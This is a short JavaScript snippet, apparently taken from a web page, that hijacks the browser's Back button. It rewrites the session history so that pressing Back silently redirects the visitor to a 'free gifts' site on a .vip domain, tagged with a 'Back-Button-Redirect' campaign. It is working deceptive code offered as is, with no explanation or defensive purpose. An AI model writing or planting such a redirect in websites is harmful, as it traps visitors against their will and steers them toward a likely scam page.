(function (window, location) { var redirect = "https://free.giftsandmore.vip/?utm_medium=bddab1254dc804572f4ea39f14a9b6c0d448fe5f&utm_campaign=Back-Button-Redirect&np=1"; var currentUrl = location.origin + location.pathname + location.search; if (location.hash !== "#!/hst") { history.replaceState(null, document.title, currentUrl + "#!/hst"); history.pushState(null, document.title, currentUrl); } window.addEventListener("popstate", function () { if (location.hash === "#!/hst") { setTimeout(function () { window.location.replace(redirect); }, 0); } }, false); }(window, location));